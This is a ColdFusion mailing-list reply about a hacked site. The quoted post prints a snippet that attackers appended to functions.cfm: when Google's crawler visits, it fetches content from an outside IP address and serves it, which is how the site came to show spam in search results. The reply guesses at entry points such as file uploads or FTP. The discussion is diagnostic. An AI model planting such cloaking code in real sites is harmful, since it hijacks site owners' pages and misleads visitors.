>Recently a site of ours got hacked - basically, a Google search the site >was returning viagra info! >What we got was a small script added to the end of a functions.cfm file: > ><cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) /><cfif (Find( >"google", REQUEST.UserAgent )) > ><cfhttp method="get" >url="http://168.16.228.250/fms/";><cfoutput>#cfhttp.filecontent#</cfoutput></cfif> > >I'm not the server admin for this site, so they're sorta pointing the >finger at us developers, and we're pointing fingers back at them about >lax server security. We've got a boatload of stuff on this site to >prevernt SQL injection, including Justin D. Scott's application script, >carefully checking anything to goes into the database, client and server >side form validation, blah, blah, blah... > >Anybody seen the above, and if so, thoughts? Anybody manage to determine >how the exploit happened to start with?
does the application have any cffile uploads? do those uploads put the file into a url accessible directory? ftp server hack wouldn't be unthinkable either. but it sounds like good way to promote clicks :) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:353148 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
